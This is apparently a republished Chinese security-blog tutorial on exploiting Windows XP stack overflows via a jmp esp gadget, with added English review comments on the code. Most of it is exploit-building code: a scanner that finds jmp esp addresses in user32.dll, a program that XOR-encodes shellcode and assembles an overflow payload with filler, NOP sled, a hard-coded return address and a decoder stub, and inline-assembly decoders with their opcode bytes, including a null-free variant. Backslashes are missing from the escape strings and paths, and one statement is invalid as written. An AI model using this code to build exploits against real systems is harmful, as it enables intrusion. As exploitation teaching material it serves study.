本文讲的是
Windows Shellcode学习笔记——栈溢出中对jmp esp的利用与优化,
0x00 前言
栈布局：buffer | 前栈帧 EBP | 返回地址 | ESP
// Scans the in-memory image of DLL_NAME for the two-byte sequence FF E4 (the
// x86 encoding of `jmp esp`) and prints every offset where it occurs.
// The address it reports is only stable on systems without ASLR (the article
// tests on Windows XP); on ASLR-enabled systems it changes per boot.
#include <stdio.h>
#include <windows.h>
#define DLL_NAME "user32.dll"
int main()
{
    BYTE *ptr;
    int position,address;   // NOTE(review): this outer `address` is never used; both branches below declare their own
    HINSTANCE handle;
    BOOL done_flag=FALSE;
    handle=LoadLibrary(DLL_NAME);
    if(!handle)
    {
        printf("load dll error");
        return 0;   // NOTE(review): reports failure with a success exit code
    }
    ptr=(BYTE *)handle;   // HINSTANCE is the module load base, so ptr[position] reads raw image bytes
    // No upper bound: the loop walks forward until a read faults past the mapped
    // image and the handler below sets done_flag. Bounding it by the image size
    // from the PE header would avoid the deliberate out-of-bounds read.
    for(position=0;!done_flag;position++)
    {
        try
        {
            if(ptr[position]==0xFF &&ptr[position+1]==0xE4)
            {
                int address=(int)ptr+position;   // load base + offset; `int` truncates pointers on 64-bit builds
                // NOTE(review): "0x%xn" looks like "0x%x\n" with the backslash lost in extraction
                printf("OPCODE found at 0x%xn",address);
            }
        }
        catch(...)
        {
            // Reached only if the access violation is delivered as a C++ exception,
            // which needs MSVC's asynchronous exception model (/EHa); under /EHsc the
            // fault is not caught and the process simply crashes — confirm build flags.
            int address=(int)ptr+position;
            printf("END OF 0x%xn",address);
            done_flag=true;
        }
    }
    return 0;
}
"x34x33x32x31“*11+"x90x90x90x90x90x90x90x90"+"x53x93xD2x77"+"x83xC2x14x33xC9x8Ax1Cx0Ax80xF3x44x88x1Cx0Ax41x80xFBx91x75xF1"+加密的弹框shellcode+xD5
#include <windows.h>
// NOTE(review): printf/fopen/fread are used without <stdio.h>; on MSVC <windows.h>
// happens to pull it in, so this only builds there.

// Returns the size in bytes of the file at szFilePath (0 for an empty file).
// NOTE(review): fopen's result is not checked; a missing file crashes in fseek.
size_t GetSize(char * szFilePath)
{
    size_t size;
    FILE* f = fopen(szFilePath, "rb");
    fseek(f, 0, SEEK_END);
    size = ftell(f);   // ftell returns long; its -1 error value becomes a huge size_t here
    rewind(f);
    fclose(f);
    return size;
}

// Reads the whole file at szFilePath into a new[]-allocated buffer and stores
// its length in *size. Returns NULL for an empty or unreadable file.
// Ownership: the caller must delete[] the returned buffer.
unsigned char* ReadBinaryFile(char *szFilePath, size_t *size)
{
    unsigned char *p = NULL;
    FILE* f = NULL;
    size_t res = 0;
    *size = GetSize(szFilePath);
    if (*size == 0) return NULL;
    f = fopen(szFilePath, "rb");
    if (f == NULL)
    {
        printf("Binary file does not exists!n");   // "n": backslash of "\n" apparently lost in extraction
        return 0;
    }
    p = new unsigned char[*size];
    rewind(f);
    res = fread(p, sizeof(unsigned char), *size, f);
    fclose(f);
    if (res == 0)   // NOTE(review): only a zero-length read counts as failure; a short read is returned as if complete
    {
        delete[] p;
        return NULL;
    }
    return p;
}

// XOR-encodes shellcode.bin with 0x44 and writes shellcode2.bin, prefixed with
// the layout the article describes: filler, NOP sled, a jmp-esp address, the
// decoder stub, then the encoded body and a terminator byte.
int main(int argc, char* argv[])
{
    // NOTE(review): path separators appear lost in extraction (presumably "c:\test\shellcode.bin")
    char *szFilePath="c:testshellcode.bin";
    char *szFilePath2="c:testshellcode2.bin";
    unsigned char *BinData = NULL;
    size_t size = 0;
    BinData = ReadBinaryFile(szFilePath, &size);
    // NOTE(review): BinData may be NULL here (missing or empty input) and is never delete[]'d.
    for(int i=0;i<size;i++)   // int vs size_t comparison (-Wsign-compare)
    {
        BinData[i]=BinData[i]^0x44;   // same key the decoder stub applies (xor bl,0x44)
    }
    FILE* f = NULL;
    f = fopen(szFilePath2, "wb");
    if (f == NULL)
    {
        printf("Create errorn");
        return 0;
    }
    // The byte-string literals below appear to have lost their "\x" escapes in
    // extraction ("x34x33..." for "\x34\x33..."); as written they are plain ASCII.
    // filler: 11 repetitions of 34 33 32 31 (the "*11" in the layout formula above);
    // presumably filler + NOP sled cover the buffer and saved EBP so that jmpesp
    // lands on the return address — confirm against the stack layout.
    char filler[]="x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31x34x33x32x31";
    char nop[]="x90x90x90x90x90x90x90x90";
    // Little-endian address of a `jmp esp`; presumably the value the scanner above
    // reported for user32.dll on the author's Windows XP system (no ASLR), so it
    // is specific to that build.
    char jmpesp[]="x53x93xD2x77";
    // Decoder stub: the same xor-0x44 loop as the inline-asm listings, keyed off
    // edx (83 C2 14 = add edx,0x14; 8A 1C 0A = mov bl,[edx+ecx]).
    char decode[]="x83xC2x14x33xC9x8Ax1Cx0Ax80xF3x44x88x1Cx0Ax41x80xFBx91x75xF1";
    char end[]="xD5";   // 0xD5 ^ 0x44 == 0x91, the terminator the decoder's `cmp bl,0x91` stops on
    fwrite(filler,sizeof(filler)-1,1,f);   // sizeof-1 drops each literal's trailing NUL
    fwrite(nop,sizeof(nop)-1,1,f);
    fwrite(jmpesp,sizeof(jmpesp)-1,1,f);
    fwrite(decode,sizeof(decode)-1,1,f);
    fwrite(BinData,size,1,f);
    fwrite(end,1,1,f);
    fclose(f);   // NOTE(review): fwrite/fclose results unchecked; main falls off the end without a return
}
if(!(fp=fopen("password.txt","rw+")))
if(!(fp=fopen("password2.txt","rb")))
测试系统: Win XP；编译器: VC6.0；build 版本: debug 版本
// Decoder stub written as inline assembly so its machine-code bytes can be
// extracted (the hex string that follows this listing).
void main()
{
    __asm
    {
        // Derive the payload address from edi; assumes edi's value at entry has a
        // fixed relation to the payload — TODO confirm from the article's analysis.
        // `sub edi,imm32` encodes as 81 EF F0 08 00 00: the two 0x00 bytes are
        // what the next listing removes.
        sub edi,0x8F0
        mov eax,edi
        add eax,0x28            // eax -> first encoded byte; presumably this stub's length plus what precedes it
        xor ecx,ecx             // ecx = 0, running index
    decode_loop:
        mov bl,[eax+ecx]
        xor bl,0x44             // decode one byte (key matches the encoder's ^0x44)
        mov [eax+ecx],bl        // written back in place, so the region must be writable
        inc ecx
        cmp bl,0x91             // 0x91 is the terminator (stored as 0xD5); tested after the byte is already written
        jne decode_loop         // no length bound: any 0xD5 inside the encoded body also ends the loop early
    }
}
"x81xEFxF0x08x00x00x8BxC7x83xC0x28x33xC9x8Ax1Cx08x80xF3x44x88x1Cx08x41x80xFBx91x75xF1"
// Second form of the decoder stub: same loop as the previous listing, with the
// edi adjustment split into two immediates that contain no 0x00 byte (compare
// the x00x00 in the previous hex string with the one that follows this listing).
void main()
{
    __asm
    {
        add edi,0X11111111
        sub edi,0X111119A1      // net effect: edi -= 0x890 (0x111119A1 - 0x11111111)
        // NOTE(review): the net offset differs from the 0x8F0 of the first
        // listing, and 0x5A below from 0x28; presumably the layout changed — confirm.
        mov eax,edi
        add eax,0x5A            // eax -> first encoded byte
        xor ecx,ecx             // ecx = 0, running index
    decode_loop:
        mov bl,[eax+ecx]
        xor bl,0x44             // decode one byte (key matches the encoder's ^0x44)
        mov [eax+ecx],bl        // written back in place, so the region must be writable
        inc ecx
        cmp bl,0x91             // 0x91 is the terminator (stored as 0xD5); tested after the byte is already written
        jne decode_loop         // no length bound: any 0xD5 inside the encoded body also ends the loop early
    }
}
"x81xC7x11x11x11x11x81xEFxA1x19x11x11x8BxC7x83xC0x5Ax33xC9x8Ax1Cx08x80xF3x44x88x1Cx08x41x80xFBx91x75xF1"
// Scans DLL_NAME for FF E4 (`jmp esp`) exactly like the main() earlier on the
// page, but returns the address instead of printing it. Returns 0 (NULL) if the
// DLL cannot be loaded or the scan ends without a hit.
unsigned char *GetAddress()
{
    BYTE *ptr;
    int position,address;   // NOTE(review): this outer `address` is never used
    HINSTANCE handle;
    BOOL done_flag=FALSE;
    handle=LoadLibrary(DLL_NAME);
    if(!handle)
    {
        printf("load dll error");
        return 0;
    }
    ptr=(BYTE *)handle;   // module load base; ptr[position] reads raw image bytes
    // No upper bound: the loop ends only when a read faults past the mapped image.
    for(position=0;!done_flag;position++)
    {
        try
        {
            if(ptr[position]==0xFF &&ptr[position+1]==0xE4)
            {
                int address=(int)ptr+position;   // `int` truncates pointers on 64-bit builds
                unsigned char *Buff=(unsigned char *)&address;
                // BUG: returns the address of a local; it dangles as soon as this
                // function returns, so the caller reads freed stack. The value would
                // need to be copied into caller-owned storage instead.
                return Buff;
            }
        }
        catch(...)
        {
            // Only reached under MSVC's asynchronous exception model (/EHa); with
            // /EHsc the access violation is not caught — confirm build flags.
            int address=(int)ptr+position;
            printf("END OF 0x%xn",address);   // "n": backslash of "\n" apparently lost in extraction
            done_flag=true;
        }
    }
    return 0;
}
unsigned char *jmpesp=NULL;
// NOTE(review): an assignment statement at file scope is not valid C/C++;
// presumably this line sits inside a function in the original source.
jmpesp=GetAddress();
原文发布时间为:2017年3月8日
本文作者:3gstudent
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。